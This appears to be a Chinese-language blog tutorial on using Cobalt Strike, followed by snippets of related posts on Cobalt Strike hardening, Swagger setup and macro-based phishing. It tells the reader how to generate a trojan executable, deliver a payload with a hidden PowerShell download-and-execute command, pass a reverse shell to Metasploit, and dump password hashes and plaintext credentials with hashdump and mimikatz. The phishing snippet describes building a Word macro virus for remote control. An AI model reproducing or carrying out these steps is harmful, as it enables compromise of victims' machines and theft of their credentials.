其中afanti就是密碼
使用者名稱隨意寫,密碼添afanti
attacks->packages->windows executable
選擇剛剛生成的listener,生成木馬到桌面。
雙擊artifact.exe木馬,客戶就能上線。
attacks->packages->payload generator
選擇一種語言生成payload
attacks->web drive-by->scripted web delivery
powershell.exe -nop -w hidden -c "iex ((new-object net.webclient).downloadstring(''))"
在cobalt strik中執行,先新增乙個監聽命令,名稱為:msf payload選擇:windows/foreign/reverse_tcp 監聽埠:4444選擇剛剛建立的msf_litener
msf配置好在互動介面點選spawn就會把shell彈到msf上,shell彈回來
執行截圖命令
在view->screenshot檢視
beacon> sleep 0 //快速顯示結果
beacon> wdigest //讀取資訊
beacon>hashdump //讀取賬號hash密碼值,需要administer許可權,右擊受害者主機--access-hashdump
beacon> logonpasswords //執行mimikatz, 右擊受害者主機--access- run mimikatz
cobalt strike入門和防護
不要在cobalt strike中使用預設的https證書。1.1 如何使用自簽名證書見 0.0.0.0是cobalt strike dns beacon特徵。使用dns idle malleable c2選項將其更改為其他內容。編輯teamserver指令碼的最後一行,將埠從50050更改為其他內...
SpringBoot Swagger簡單使用
io.springfox springfox swagger2 2.9.2 io.springfox springfox swagger ui 2.9.2 import org.springframework.context.annotation.bean import org.springfram...
cobalt strike批量傳送釣魚郵件
這裡我們生成木馬可以用cs帶的hta office巨集 word巨集來使目標上線cs,這裡以word巨集病毒為例子。首先我們需要製作乙個word巨集病毒來進行遠控操作。在cobalt strike中,需要新建乙個監聽程式來進行監聽,如下圖 然後點選attacks packages ms office...